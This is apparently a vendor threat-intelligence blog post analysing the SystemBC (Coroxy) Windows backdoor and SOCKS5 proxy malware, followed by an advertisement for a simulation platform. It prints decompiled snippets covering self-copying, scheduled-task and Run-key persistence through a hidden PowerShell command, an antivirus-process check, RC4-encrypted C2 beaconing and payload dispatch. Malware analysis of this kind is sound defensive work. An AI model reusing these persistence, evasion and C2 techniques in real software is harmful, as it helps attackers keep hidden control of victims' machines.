SystemBC Malware: How the Coroxy Proxy Backdoor Targets Windows
| June 29, 2026
Key Takeaways
- SystemBC (also tracked as Coroxy) is a Windows malware family that turns infected machines into SOCKS5 proxies.
- Beyond proxying, SystemBC functions as a persistent backdoor and RAT, executing commands, scripts, and binaries from C2.
- SystemBC has appeared in intrusions tied to ransomware families including Ryuk, Egregor, Conti, BlackBasta, Play, and Rhysida.
- Newer builds shift C2 traffic from raw TCP/SOCKS5 toward Tor, using a client resembling the mini-tor library.
- The Picus Platform simulates SystemBC attacks to test security controls against real-life cyber threats.
What Is SystemBC?
SystemBC (also tracked as Coroxy) is a Windows malware family that primarily turns an infected machine into a SOCKS5 proxy while also functioning as a persistent backdoor and RAT.
It was first publicly documented in 2019 after being observed as a payload in the RIG and Fallout exploit kits, and it has since become a staple "Swiss-army-knife" tool sold on underground forums and adopted by dozens of criminal groups.
At its core, SystemBC does two things:
- Proxies traffic: It establishes a SOCKS5 (and, in later builds, Tor) tunnel so attackers can route the traffic of other malware through the victim.
- Provides remote access: It executes commands, scripts, and binaries delivered from the C2 server.
Because it is lightweight and easy to fold into an existing toolkit, SystemBC is frequently paired with loaders such as Buer, QBot, and Emotet. It has appeared in intrusions tied to many ransomware families, including Ryuk, Egregor, and Conti, among others.
Key Facts About SystemBC
|
Attribute |
Detail |
|
Aliases |
SystemBC, Coroxy |
|
Malware type |
Proxy malware, backdoor, bot, RAT |
|
First seen |
2018-2019 |
|
Primary function |
SOCKS5 proxy to tunnel/hide other malware's C2 traffic |
|
Languages observed |
C / MASM (assembler), C++, and .NET variants |
|
Payloads it can run |
EXE, DLL, shellcode, VBS, BAT, CMD, PowerShell |
|
Associated ransomware |
Ryuk, Egregor, Maze, MountLocker, Conti, BlackBasta, Play, ViceSociety, 8Base, Rhysida |
How Does SystemBC Malware Work?
SystemBC follows a consistent execution flow across versions: it deploys and copies itself, establishes persistence, gathers basic host/user data, then enters a connection loop and waits for the operator.
The implementation details (packing, language, mutex naming, and persistence path) change between variants, but the capabilities stay remarkably stable. The sections below break down each stage and note where individual variants differ.
Initial Infection and Deployment
SystemBC is rarely the first-stage payload. It typically arrives via exploit kits or is dropped by another loader after initial access, then is deployed deeper in the network once attackers have credentials and lateral movement.
- In the earliest documented campaigns, SystemBC was delivered as a payload by the RIG and Fallout exploit kits [2]. In one chain, Fallout dropped a "PowerEnum" stage that instructed the download of the SystemBC proxy DLL.
- In ransomware intrusions, SystemBC was deployed as one of several commodity tools to maintain persistence across a network. For example, it was dropped onto a domain controller during a Ryuk attack [1].
On execution, the deployment logic checks whether it was launched with a start command-line argument (indicating it is already running as a scheduled task). If not, it copies itself into a randomly named directory and file under %ProgramData%, then registers that copy as a scheduled task launched with start to gain persistence.
Crucially, it skips creating the service if Emsisoft's a2guard.exe is running:
|
... if ( !find_process_by_name(aA2guardExe) ) // "a2guard.exe" { GetModuleFileNameA(0, Filename, 0x100u); create_random_directory(NewFileName, Name); CopyFileA(Filename, NewFileName, 0); create_scheduled_task(Name, 0, NewFileName, aStart, 0, 1); // "start" } } |
In the in-memory variant, the binary carries a second, packed SystemBC executable that it unpacks and either self-injects or runs from a dropped path.
Persistence Mechanisms
SystemBC persists through two complementary mechanisms: a registry Run key and a scheduled task, both of which re-launch the malware on logon or boot.
The registry technique writes a value (commonly named socks5) under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, pointing at a hidden PowerShell command that re-runs the binary [3]:
|
# Registry persistence (MASM variant) Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ValueName: socks5 ValueData: powershell.exe -windowstyle hidden -Command "& 'C:\Users\<user>\Desktop\...\stmbc.exe'" |
In the scheduled-task variant, persistence relies on Windows tasks rather than the Run key. The malware computes a random name, deletes any pre-existing .job of the same name, then builds and writes a <random>.job task under C:\Windows\Tasks\ that runs the ProgramData copy.
Command-and-Control Communication
SystemBC's C2 design is built around a beacon to a hard-coded host plus an encrypted channel, and the exact transport has evolved from raw TCP/SOCKS5 toward Tor in newer builds.
In SOCKS5 builds, important strings (C2 servers, DNS servers, port) are stored encrypted with a 40-byte XOR key held in memory.
Here is the decrypted configuration:
|
# Decrypted configuration layout HOST1: <C2 Server 1> HOST2: <C2 Server 2> PORT1: 4001 DNS1: <ip> DNS2: ns1.vic.au.dns.opennic[.]glue DNS3: ns2.vic.au.dns.opennic[.]glue … |
The client opens communication by sending a 100-byte packet to the C2. Its first 50 bytes are a plaintext RC4 key; the remaining 50 are RC4-encrypted host/user fields [2]:
|
/* Initial packet creation */ GetUserNameExA(2, &packet->username, packet); copyArg1toArg2(&key, (undefined *)packet, 50); uVar3 = rtlGetVers(); *(undefined4 *)&packet->rtlCheck = uVar3; lpParameter = isWow64Proc(); packet->isWow64 = (char)lpParameter; /* RC4 the last 50 bytes of the packet with the key */ RC4_implementation(&key, 50, &packet->rtlCheck, 50); /* Send the 100-byte packet */ sendingData(the_socket, (char *)packet, 100, (HANDLE)0x0); |
Some builds resolve .bit domains through configured DNS servers. The code checks whether a server name ends in .bit and, if so, resolves it via the alternate DNS list:
|
/* ".bit" suffix check */ if (((int)(pcVar1 + -4) < 0) || (*(int *)(pcVar1 + -4 + (int)param_1) != 0x7469622e)) { /* not a .bit domain */ } |
In a Tor-enabled variant, most C2 traffic moves over Tor rather than a plain SOCKS5 tunnel. The Tor client closely resembles the open-source mini-tor library and makes heavy use of Windows CNG / BCrypt APIs.
The binary also embeds known Tor directory-authority gateways:
|
; Tor client init + embedded directory authorities push offset aBcryptopenalgo ; "BCryptOpenAlgorithmProvider" ... push offset aBcrypt_dll ; "bcrypt.dll" ... mov [ebp+readfds.fd_array+0DCh], offset a193_23_244_244 ; "193.23.244.244" mov [ebp+readfds.fd_array+0E4h], offset a86_59_21_38 ; "86.59.21.38" mov [ebp+readfds.fd_array+0ECh], offset a199_58_81_140 ; "199.58.81.140" mov [ebp+readfds.fd_array+0F4h], offset a204_13_164_118 ; "204.13.164.118" … |
SOCKS5 Proxy Functionality
The defining capability of SystemBC is turning the victim into a SOCKS5 proxy, letting operators tunnel the traffic of other malware (such as banking trojans) through the infected host so it blends in and evades network-edge detection.
After the initial check-in, the server's response packet contains a small header plus data, decrypted separately with the RC4 key from the first packet. The header's type byte controls what the bot does:
|
Byte 0 Type: 1 = following data is SOCKS5 traffic for the given index; 0 = create a new proxy with the assigned index; -1 = update malware (download an EXE to %TEMP% with a random name and run it) |
The control panel that ships with the malware lists each victim and its live SOCKS connections by port, country, region, and city, and supports an auto-update URL and built-in authentication. The underground listing advertised support for up to 40,000 incoming connections, multi-threaded operation, GeoIP via MaxMind, and tiny client binaries.
Loader Functionality
Beyond proxying, SystemBC is a capable loader and remote-execution engine: the operator can push payloads down the channel for the bot to run, giving attackers a "point-and-shoot" way to perform discovery, exfiltration, and lateral movement with packaged scripts and binaries, without hands-on-keyboard time on each host.
SystemBC can parse and execute several payload types delivered from the C2: EXE, DLL, shellcode, VBS, BAT, CMD, and PowerShell. It selects the handler by matching an extension marker in the received data [1]:
|
/* Payload-type dispatch from C2 data */ zeromemory(&dll_check, 4u); while (v18) { if (*(recv_data + v18 + 8) == '#') { dll_check = ... // '#' marks a DLL export name } --v18; } v53[0] = 'exe'; // .exe v19 = strlen(recv_data + 2); if (*(recv_data + v19 + 4) == 'sbv.') v53[0] = 'sbv'; // .vbs if (*(recv_data + v19 + 4) == 'tab.') v53[0] = 'tab'; // .bat if (*(recv_data + v19 + 4) == 'dmc.') v53[0] = 'dmc'; // .cmd if (*(recv_data + v19 + 4) == '1sp.') v53[0] = '1sp'; // .ps1 |
For VBS, BAT, and CMD payloads, the bot writes a randomly named file to %TEMP% and creates a scheduled task to run it. For PowerShell, it creates a scheduled task with these parameters:
|
-WindowStyle Hidden -ep bypass -file " |
Shellcode and In-Memory Execution
SystemBC can run payloads directly in memory without dropping them to disk, which reduces its forensic footprint.
When data received from the C2 is not parsed as a script, the bot inspects it for an MZ header to decide how to execute it:
- If it finds an MZ / PE executable, it loads and runs it directly in memory without writing a file.
- If there is no MZ signature, it assumes the blob is shellcode and spawns a thread to execute it.
- If the blob is a DLL, it maps the module in memory and invokes the requested export (via call_dll_export_function_thread).
How Picus Simulates SystemBC Malware Attacks?
We also strongly suggest simulating SystemBC Malware Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Platform. You can also test your defenses against hundreds of other malware variants, such as BRICKSTORM, VenomRAT, Chinotto, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for the SystemBC Malware Attacks:
|
Threat ID |
Threat Name |
Attack Module |
|
85733 |
SystemBC Backdoor Malware Download Threat |
Network Infiltration |
|
39357 |
SystemBC Backdoor Malware Email Threat |
E-mail Infiltration |
|
31789 |
SystemBC RAT Download Threat |
Network Infiltration |
|
56556 |
SystemBC RAT Email Threat |
E-mail Infiltration |
|
89123 |
SystemBC Hacking Tool Download Threat |
Network Infiltration |
|
87103 |
SystemBC Hacking Tool Email Threat |
E-mail Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Platform.
References
[1] S. Gn and S. Gallagher, “Ransomware operators use SystemBC RAT as off-the-shelf Tor backdoor,” Sophos. Accessed: Jun. 24, 2026. [Online]. Available: https://www.sophos.com/blog/systembc
[2] K. Harmon, “SystemBC is like Christmas in July for SOCKS5 Malware and Exploit Kits,” Proofpoint. Accessed: Jun. 24, 2026. [Online]. Available: https://www.proofpoint.com/au/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits
[3] “Malware-Threat-Reports/The Swiss Knife - SystemBC,” GitHub. Accessed: Jun. 24, 2026. [Online]. Available: https://github.com/vc0RExor/Malware-Threat-Reports/blob/7885ec25efda9f137051ba6a6f8c8388861b568d/The%20Swiss%20Knife%20-%20SystemBC%20%7C%20Coroxy/The%20Swiss%20Knife-SystemBC_EN.pdf
